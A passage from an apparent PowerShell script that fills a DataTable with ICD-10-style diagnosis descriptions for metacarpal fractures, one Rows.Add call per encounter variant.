of first metacarpal bone, unspecified hand","Nondisplaced fracture of neck of first metacarpal bone, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, unspecified hand","Nondisplaced fracture of neck of first metacarpal bone, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, unspecified hand","Nondisplaced fracture of neck of first metacarpal bone, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, unspecified hand","Nondisplaced fracture of neck of first metacarpal bone, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of first metacarpal bone, unspecified hand","Nondisplaced fracture of neck of first metacarpal bone, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, right hand","Other fracture of first metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, right hand","Other fracture of first metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, right hand","Other fracture of first metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, right hand","Other fracture of first metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, right hand","Other fracture of first metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, right hand","Other fracture of first metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, right hand","Other fracture of first metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, left hand","Other fracture of first metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, left hand","Other fracture of first metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, left hand","Other fracture of first metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, left hand","Other fracture of first metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, left hand","Other fracture of first metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, left hand","Other fracture of first metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, left hand","Other fracture of first metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, unspecified hand","Other fracture of first metacarpal bone, unspecified hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, unspecified hand","Other fracture of first metacarpal bone, unspecified hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, unspecified hand","Other fracture of first metacarpal bone, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, unspecified hand","Other fracture of first metacarpal bone, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, unspecified hand","Other fracture of first metacarpal bone, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, unspecified hand","Other fracture of first metacarpal bone, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of first metacarpal bone, unspecified hand","Other fracture of first metacarpal bone, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, right hand","Unspecified fracture of second metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, right hand","Unspecified fracture of second metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, right hand","Unspecified fracture of second metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, right hand","Unspecified fracture of second metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, right hand","Unspecified fracture of second metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, right hand","Unspecified fracture of second metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, right hand","Unspecified fracture of second metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, left hand","Unspecified fracture of second metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, left hand","Unspecified fracture of second metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, left hand","Unspecified fracture of second metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, left hand","Unspecified fracture of second metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, left hand","Unspecified fracture of second metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, left hand","Unspecified fracture of second metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second metacarpal bone, left hand","Unspecified fracture of second metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, right hand","Unspecified fracture of third metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, right hand","Unspecified fracture of third metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, right hand","Unspecified fracture of third metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, right hand","Unspecified fracture of third metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, right hand","Unspecified fracture of third metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, right hand","Unspecified fracture of third metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, right hand","Unspecified fracture of third metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, left hand","Unspecified fracture of third metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, left hand","Unspecified fracture of third metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, left hand","Unspecified fracture of third metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, left hand","Unspecified fracture of third metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, left hand","Unspecified fracture of third metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, left hand","Unspecified fracture of third metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third metacarpal bone, left hand","Unspecified fracture of third metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, right hand","Unspecified fracture of fourth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, right hand","Unspecified fracture of fourth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, right hand","Unspecified fracture of fourth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, right hand","Unspecified fracture of fourth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, right hand","Unspecified fracture of fourth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, right hand","Unspecified fracture of fourth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, right hand","Unspecified fracture of fourth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, left hand","Unspecified fracture of fourth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, left hand","Unspecified fracture of fourth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, left hand","Unspecified fracture of fourth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, left hand","Unspecified fracture of fourth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, left hand","Unspecified fracture of fourth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, left hand","Unspecified fracture of fourth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth metacarpal bone, left hand","Unspecified fracture of fourth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, right hand","Unspecified fracture of fifth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, right hand","Unspecified fracture of fifth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, right hand","Unspecified fracture of fifth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, right hand","Unspecified fracture of fifth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, right hand","Unspecified fracture of fifth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, right hand","Unspecified fracture of fifth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, right hand","Unspecified fracture of fifth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, left hand","Unspecified fracture of fifth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, left hand","Unspecified fracture of fifth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, left hand","Unspecified fracture of fifth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, left hand","Unspecified fracture of fifth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, left hand","Unspecified fracture of fifth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, left hand","Unspecified fracture of fifth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth metacarpal bone, left hand","Unspecified fracture of fifth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of other metacarpal bone","Unspecified fracture of other metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of other metacarpal bone","Unspecified fracture of other metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of other metacarpal bone","Unspecified fracture of other metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of other metacarpal bone","Unspecified fracture of other metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of other metacarpal bone","Unspecified fracture of other metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of other metacarpal bone","Unspecified fracture of other metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of other metacarpal bone","Unspecified fracture of other metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified metacarpal bone","Unspecified fracture of unspecified metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified metacarpal bone","Unspecified fracture of unspecified metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified metacarpal bone","Unspecified fracture of unspecified metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified metacarpal bone","Unspecified fracture of unspecified metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified metacarpal bone","Unspecified fracture of unspecified metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified metacarpal bone","Unspecified fracture of unspecified metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified metacarpal bone","Unspecified fracture of unspecified metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, right hand","Displaced fracture of base of second metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, right hand","Displaced fracture of base of second metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, right hand","Displaced fracture of base of second metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, right hand","Displaced fracture of base of second metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, right hand","Displaced fracture of base of second metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, right hand","Displaced fracture of base of second metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, right hand","Displaced fracture of base of second metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, left hand","Displaced fracture of base of second metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, left hand","Displaced fracture of base of second metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, left hand","Displaced fracture of base of second metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, left hand","Displaced fracture of base of second metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, left hand","Displaced fracture of base of second metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, left hand","Displaced fracture of base of second metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of second metacarpal bone, left hand","Displaced fracture of base of second metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, right hand","Displaced fracture of base of third metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, right hand","Displaced fracture of base of third metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, right hand","Displaced fracture of base of third metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, right hand","Displaced fracture of base of third metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, right hand","Displaced fracture of base of third metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, right hand","Displaced fracture of base of third metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, right hand","Displaced fracture of base of third metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, left hand","Displaced fracture of base of third metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, left hand","Displaced fracture of base of third metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, left hand","Displaced fracture of base of third metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, left hand","Displaced fracture of base of third metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, left hand","Displaced fracture of base of third metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, left hand","Displaced fracture of base of third metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of third metacarpal bone, left hand","Displaced fracture of base of third metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, right hand","Displaced fracture of base of fourth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, right hand","Displaced fracture of base of fourth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, right hand","Displaced fracture of base of fourth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, right hand","Displaced fracture of base of fourth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, right hand","Displaced fracture of base of fourth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, right hand","Displaced fracture of base of fourth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, right hand","Displaced fracture of base of fourth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, left hand","Displaced fracture of base of fourth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, left hand","Displaced fracture of base of fourth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, left hand","Displaced fracture of base of fourth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, left hand","Displaced fracture of base of fourth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, left hand","Displaced fracture of base of fourth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, left hand","Displaced fracture of base of fourth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fourth metacarpal bone, left hand","Displaced fracture of base of fourth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, right hand","Displaced fracture of base of fifth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, right hand","Displaced fracture of base of fifth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, right hand","Displaced fracture of base of fifth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, right hand","Displaced fracture of base of fifth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, right hand","Displaced fracture of base of fifth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, right hand","Displaced fracture of base of fifth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, right hand","Displaced fracture of base of fifth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, left hand","Displaced fracture of base of fifth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, left hand","Displaced fracture of base of fifth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, left hand","Displaced fracture of base of fifth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, left hand","Displaced fracture of base of fifth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, left hand","Displaced fracture of base of fifth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, left hand","Displaced fracture of base of fifth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of fifth metacarpal bone, left hand","Displaced fracture of base of fifth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of other metacarpal bone","Displaced fracture of base of other metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of other metacarpal bone","Displaced fracture of base of other metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of other metacarpal bone","Displaced fracture of base of other metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of other metacarpal bone","Displaced fracture of base of other metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of other metacarpal bone","Displaced fracture of base of other metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of other metacarpal bone","Displaced fracture of base of other metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of other metacarpal bone","Displaced fracture of base of other metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of unspecified metacarpal bone","Displaced fracture of base of unspecified metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of unspecified metacarpal bone","Displaced fracture of base of unspecified metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of unspecified metacarpal bone","Displaced fracture of base of unspecified metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of unspecified metacarpal bone","Displaced fracture of base of unspecified metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of unspecified metacarpal bone","Displaced fracture of base of unspecified metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of unspecified metacarpal bone","Displaced fracture of base of unspecified metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of unspecified metacarpal bone","Displaced fracture of base of unspecified metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, right hand","Displaced fracture of shaft of second metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, right hand","Displaced fracture of shaft of second metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, right hand","Displaced fracture of shaft of second metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, right hand","Displaced fracture of shaft of second metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, right hand","Displaced fracture of shaft of second metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, right hand","Displaced fracture of shaft of second metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, right hand","Displaced fracture of shaft of second metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, left hand","Displaced fracture of shaft of second metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, left hand","Displaced fracture of shaft of second metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, left hand","Displaced fracture of shaft of second metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, left hand","Displaced fracture of shaft of second metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, left hand","Displaced fracture of shaft of second metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, left hand","Displaced fracture of shaft of second metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of second metacarpal bone, left hand","Displaced fracture of shaft of second metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, right hand","Displaced fracture of shaft of third metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, right hand","Displaced fracture of shaft of third metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, right hand","Displaced fracture of shaft of third metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, right hand","Displaced fracture of shaft of third metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, right hand","Displaced fracture of shaft of third metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, right hand","Displaced fracture of shaft of third metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, right hand","Displaced fracture of shaft of third metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, left hand","Displaced fracture of shaft of third metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, left hand","Displaced fracture of shaft of third metacarpal bone, left hand, initial encounter for open fracture") + $null = 